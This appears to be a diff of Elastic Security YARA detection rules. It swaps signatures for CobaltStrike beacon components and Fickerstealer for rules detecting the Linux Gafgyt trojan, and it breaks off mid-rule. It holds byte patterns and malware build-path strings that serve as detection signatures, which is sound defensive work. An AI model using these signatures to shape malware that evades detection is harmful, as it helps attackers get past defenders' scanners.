ELASTIC_Linux_Trojan_Gafgyt_46Eec778 : FILE MEMORY { meta: - description = "Rule for beacon sleep obfuscation routine" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca" - date = "2021-10-21" - modified = "2022-01-13" + id = "46eec778-7342-4ef7-adac-35bc0cdb9867" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L849-L872" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a" - logic_hash = "6f63e4c31e55da2008f95e9d05391e40d44e2757c511e666032563ab798e274c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L574-L592" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1" + logic_hash = "08e77a31005e14a06197857301e22d20334c1f2ef7fc06a4208643438377f4c4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a_x64 = { 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03 } - $a_x64_smbtcp = { 4C 8B 07 B8 4F EC C4 4E 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 38 10 42 30 0C 06 48 } - $a_x86 = { 8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2 } - $a_x86_2 = { 8B 06 8D 3C 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 32 08 30 07 41 3B 4D 08 72 E6 8B 45 FC EB C7 } - $a_x86_smbtcp = { 8B 07 8D 34 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 3A 08 30 06 41 3B 4D 08 72 E6 8B 45 FC EB } + $a = { C0 01 45 F8 48 83 45 E8 02 83 6D C8 02 83 7D C8 01 7F E4 83 7D } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_F0B627Fc : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_F51C5Ac3 : FILE MEMORY { meta: - description = "Rule for beacon reflective loader" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "f0b627fc-97cd-42cb-9eae-1efb0672762d" - date = "2021-10-21" - modified = "2022-01-13" + id = "f51c5ac3-ade9-4d01-b578-3473a2b116db" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L874-L897" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b" - logic_hash = "1087294af3a9ef59c00098f5fd7adfe0b335525e135d95e45ac30e44c6739a72" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L594-L612" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" + logic_hash = "e82b5ddb760d5bdcd146e1de12ec34c4764e668543420765146e22dee6f5732b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "34f254afdf94b1eb29bae4eb8e3864ea49e918a5dbe6e4c9d06a4292c104a792" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $beacon_loader_x64 = { 25 FF FF FF 00 3D 41 41 41 00 75 [5-10] 25 FF FF FF 00 3D 42 42 42 00 75 } - $beacon_loader_x86 = { 25 FF FF FF 00 3D 41 41 41 00 75 [4-8] 81 E1 FF FF FF 00 81 F9 42 42 42 00 75 } - $beacon_loader_x86_2 = { 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 [4-8] 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 } - $generic_loader_x64 = { 89 44 24 20 48 8B 44 24 40 0F BE 00 8B 4C 24 20 03 C8 8B C1 89 44 24 20 48 8B 44 24 40 48 FF C0 } - $generic_loader_x86 = { 83 C4 04 89 45 FC 8B 4D 08 0F BE 11 03 55 FC 89 55 FC 8B 45 08 83 C0 01 89 45 08 8B 4D 08 0F BE } + $a = { 74 2A 8B 45 0C 0F B6 00 84 C0 74 17 8B 45 0C 40 89 44 24 04 8B } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_Dcdcdd8C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_71E487Ea : FILE MEMORY { meta: - description = "Rule for beacon sleep PDB" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "dcdcdd8c-7395-4453-a74a-60ab8e251a5a" - date = "2021-10-21" - modified = "2022-01-13" + id = "71e487ea-a592-469c-a03e-0c64d2549e74" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L899-L923" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a" - logic_hash = "f3ae07282b763d3720e45a84878cc457f65041f381951cdc9affd5e3ce67e6cc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L614-L632" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b8d044f2de21d20c7e4b43a2baf5d8cdb97fba95c3b99816848c0f214515295b" + logic_hash = "3de9e0e3334e9e6e5906886f95ff8ce3596f85772dc25021fb0ee148281cf81c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8aed1ae470d06a7aac37896df22b2f915c36845099839a85009212d9051f71e9" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "8df69968ddfec5821500949015192b6cdbc188c74f785a272effd7bc9707f661" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x86.o" ascii fullword - $a3 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x64.o" ascii fullword - $a4 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x86.o" ascii fullword - $a5 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x64.o" ascii fullword - $a6 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x86.o" ascii fullword + $a = { E0 8B 45 D8 8B 04 D0 8D 50 01 83 EC 0C 8D 85 40 FF FF FF 50 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_A3Fb2616 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_6620Ec67 : FILE MEMORY { meta: - description = "Rule for browser pivot " + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "a3fb2616-b03d-4399-9342-0fc684fb472e" - date = "2021-10-21" - modified = "2022-01-13" + id = "6620ec67-8f12-435b-963c-b44a02f43ef1" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L925-L947" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a" - logic_hash = "a3c36326ccc2bc828f6654ccaba507a283f92146fdc52f71d7d934f6908793e2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L634-L652" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b91eb196605c155c98f824abf8afe122f113d1fed254074117652f93d0c9d6b2" + logic_hash = "2df2c8cdc2cb545f916159d44a800708b55a2993cd54a4dcf920a6a8dc6361e7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c15cf6aa7719dac6ed21c10117f28eb4ec56335f80a811b11ab2901ad36f8cf0" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "9d68db5b3779bb5abe078f9e36dd9a09d4d3ad9274a3a50bdfa0e444a7e46623" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "browserpivot.dll" ascii fullword - $a2 = "browserpivot.x64.dll" ascii fullword - $b1 = "$$$THREAD.C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" ascii fullword - $b2 = "COBALTSTRIKE" ascii fullword + $a = { AF 93 64 1A D8 0B 48 93 64 0B 48 A3 64 11 D1 0B 41 05 E4 48 } condition: - 1 of ($a*) and 2 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_8Ee55Ee5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D996D335 : FILE MEMORY { meta: - description = "Rule for wmi exec module" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "8ee55ee5-67f1-4f94-ab93-62bb5cfbeee9" - date = "2021-10-21" - modified = "2022-01-13" + id = "d996d335-e049-4052-bf36-6cd07c911a8b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L949-L969" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a" - logic_hash = "d0cc321e15660311ae0b8e3261abe716a50a2455f82635c1b02d0a5444c8a89a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L654-L672" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda" + logic_hash = "212c75ab61eac8b3ed2049966628dfc81ae5a620b4a4b38aaa0696d594910dea" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7e7ed4f00d0914ce0b9f77b6362742a9c8b93a16a6b2a62b70f0f7e15ba3a72b" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x64.o" ascii fullword - $a2 = "z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x86.o" ascii fullword + $a = { D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0 } condition: - 1 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_8D5963A2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D0C57A2E : FILE MEMORY { meta: - description = "Detects Windows Trojan Cobaltstrike (Windows.Trojan.CobaltStrike)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "8d5963a2-54a9-4705-9f34-0d5f8e6345a2" - date = "2022-08-10" - modified = "2022-09-29" + id = "d0c57a2e-c10c-436c-be13-50a269326cf2" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L971-L989" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9fe43996a5c4e99aff6e2a1be743fedec35e96d1e6670579beb4f7e7ad591af9" - logic_hash = "f4f8fba807256bd885ccf4946eec8c2fb76eb04f86ed76d015178fe512a3c091" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L674-L691" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2ac51f0943d573fdc9a39837aeefd9158c27a4b3f35fbbb0a058a88392a53c14" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "228cd65380cf4b04f9fd78e8c30c3352f649ce726202e2dac9f1a96211925e1c" + fingerprint = "3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D 6C 24 D8 48 81 EC 28 01 00 00 45 33 F6 48 8B D9 48 } + $a = { 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_1787Eef5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_751Acb94 : FILE MEMORY { meta: - description = "CS shellcode variants" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "1787eef5-ff00-4e19-bd22-c5dfc9488c7b" - date = "2022-08-29" - modified = "2022-09-29" + id = "751acb94-cb23-4949-a4dd-87985c47379e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L991-L1014" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a" - logic_hash = "0b70c61e986dee3126fec6eea127e01fce4b647aff8e2d2d5072eb8328549225" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L693-L710" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1963351d209168f4ae2268d245cfd5320e4442d00746d021088ffae98e5da454" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "292f15bdc978fc29670126f1bdc72ade1e7faaf1948653f70b6789a82dbee67f" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "dbdfdb455868332e9fbadd36c084d0927a3dd8ab844f0b1866e914914084cd4b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 31 C0 C9 C3 55 } - $a2 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 31 C0 C9 C3 55 89 E5 83 EC ?? 83 7D ?? ?? } - $a3 = { 55 89 E5 8B 45 ?? 5D FF E0 55 8B 15 ?? ?? ?? ?? 89 E5 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? } - $a4 = { 55 89 E5 8B 45 ?? 5D FF E0 55 89 E5 83 EC ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? } - $a5 = { 4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? 48 89 DF 48 81 C3 ?? ?? ?? ?? } + $a = { 20 54 6F 20 43 6F 6E 6E 65 63 74 21 20 00 53 75 63 63 65 73 66 } condition: - 1 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_4106070A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_656Bf077 : FILE MEMORY { meta: - description = "Detects Windows Trojan Cobaltstrike (Windows.Trojan.CobaltStrike)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "4106070a-24e2-421b-ab83-67b817a9f019" - date = "2023-05-09" - modified = "2023-06-13" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L1016-L1035" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "98789a11c06c1dfff7e02f66146afca597233c17e0d4900d6a683a150f16b3a4" - logic_hash = "90f0209a55ca381ca58264664e04c007c799cf558f143d0c02983d4caf47bfb8" + id = "656bf077-ca0c-4d28-9daa-eb6baafaf467" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L712-L730" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" + logic_hash = "0c9728304e720eb2cd00afad8d16f309514473dece48fa94af6a72ca41705a36" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c12b919064a9cd2a603c134c5f73f6d05ffbf4cbed1e5b5246687378102e4338" + fingerprint = "3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 8B 44 24 48 0F B7 00 66 C1 E8 0C 66 83 E0 0F 0F B7 C0 83 } - $a2 = { 44 24 48 0F B7 00 66 C1 E8 0C 66 83 E0 0F 0F B7 C0 83 F8 0A } + $a = { 74 28 48 8B 45 E8 0F B6 00 84 C0 74 14 48 8B 75 E8 48 FF C6 48 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_3Dc22D14 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_E6D75E6F : FILE MEMORY { meta: - description = "Detects Windows Trojan Cobaltstrike (Windows.Trojan.CobaltStrike)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3dc22d14-a2f4-49cd-a3a8-3f071eddf028" - date = "2023-05-09" - modified = "2023-06-13" + id = "e6d75e6f-aa04-4767-8730-6909958044a7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L1037-L1056" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7898194ae0244611117ec948eb0b0a5acbc15cd1419b1ecc553404e63bc519f9" - logic_hash = "2f52cd5f3b782c28e372c3daa9b7ddc4d2b9f68832f5250983412c2e7a755e73" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L732-L750" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "48b15093f33c18778724c48c34199a420be4beb0d794e36034097806e1521eb8" + logic_hash = "339dd33a3313a4a94d2515cd4c2100ac6b9d5e0029881494c28dc3e7c8a05798" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e029fac50ffe8ea3fc5bc22290af69e672895eaa8a1b9f3e9953094c133392c" + fingerprint = "e99805e8917d6526031270b6da5c2f3cc1c8235fed1d47134835a107d0df497c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%02d/%02d/%02d %02d:%02d:%02d" fullword - $a2 = "%s as %s\\%s: %d" fullword + $a = { 00 00 00 CD 80 C3 8B 54 24 04 8B 4C 24 08 87 D3 B8 5B 00 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_7F8Da98A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_7167D08F : FILE MEMORY { meta: - description = "Detects Windows Trojan Cobaltstrike (Windows.Trojan.CobaltStrike)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "7f8da98a-3336-482b-91da-82c7cef34c62" - date = "2023-05-09" - modified = "2023-06-13" + id = "7167d08f-bfeb-4d78-9783-3a1df2ef0ed3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L1058-L1076" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e3bc2bec4a55ad6cfdf49e5dbd4657fc704af1758ca1d6e31b83dcfb8bf0f89d" - logic_hash = "6c8698d65cbbf893f79ca1de5273535891418c87c234a2542f5f8079e56d9507" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L752-L770" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" + logic_hash = "88c07bf06801192f38ef66229a0aa5c1ef6242caeb080ce1c7cd13ad0d540c82" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c375492960a6277bf665bea86302cec774c0d79506e5cb2e456ce59f5e68aa2e" + fingerprint = "b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 25 63 4D 53 53 45 2D 25 64 2D 73 65 72 76 65 72 } + $a = { 0C 8A 00 3C 2D 75 13 FF 45 0C C7 45 E4 01 00 00 00 EB 07 FF } condition: all of them } -rule ELASTIC_Windows_Trojan_Fickerstealer_Cc02E75E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_27De1106 : FILE MEMORY { meta: - description = "Detects Windows Trojan Fickerstealer (Windows.Trojan.Fickerstealer)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "cc02e75e-2049-4ee4-9302-e491e7dad696" - date = "2021-07-22" - modified = "2021-08-23" + id = "27de1106-497d-40a0-8fc4-929f7a927628" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Fickerstealer.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4113ccb55e06e783b6cb213647614f039aa7dbb454baa338459ccf37897ebd6" - logic_hash = "ccfd7edf7625c13eea5b88fa29f9b8d3d873688f328f3e52c0500ac722c84511" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L772-L790" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" + logic_hash = "4e266e1ae31d7d86866b112a04ca38c0a8185c18ebb10ac6497bbaa69f51b2fd" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "022088764645d85dd20d1ce201395b4e79e3e716723715687eaecfcbe667615e" - severity = 80 + fingerprint = "9a747f0fc7ccc55f24f2654344484f643103da709270a45de4c1174d8e4101cc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii fullword - $a2 = "\"SomeNone" ascii fullword + $a = { 0C 0F B6 00 84 C0 74 18 8B 45 0C 40 8B 55 08 42 89 44 24 04 89 } condition: all of them } -rule ELASTIC_Windows_Trojan_Fickerstealer_F2159Bec : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_148B91A2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Fickerstealer (Windows.Trojan.Fickerstealer)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "f2159bec-a3ce-47a9-91ad-43b8a19ac172" - date = "2021-07-22" - modified = "2021-08-23" + id = "148b91a2-ed51-4c2d-9d15-6a48d9ea3e0a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Fickerstealer.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4113ccb55e06e783b6cb213647614f039aa7dbb454baa338459ccf37897ebd6" - logic_hash = "d36cb90b526a291858291d615272baa78881309c83376f4d4cce1768c740ddbc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L792-L810" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d5b2bde0749ff482dc2389971e2ac76c4b1e7b887208a538d5555f0fe6984825" + logic_hash = "1a974c0882c2d088c978a52e5b535807c86f117cf2f05c40c084e849b1849f5b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0671691c6d5c7177fe155e4076ab39bf5f909ed300f32c1530e80d471dff0296" + fingerprint = "0f75090ed840f4601df4e43a2f49f2b32585213f3d86d19fb255d79c21086ba3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 10 12 F2 0F 10 5A 08 31 C1 89 C6 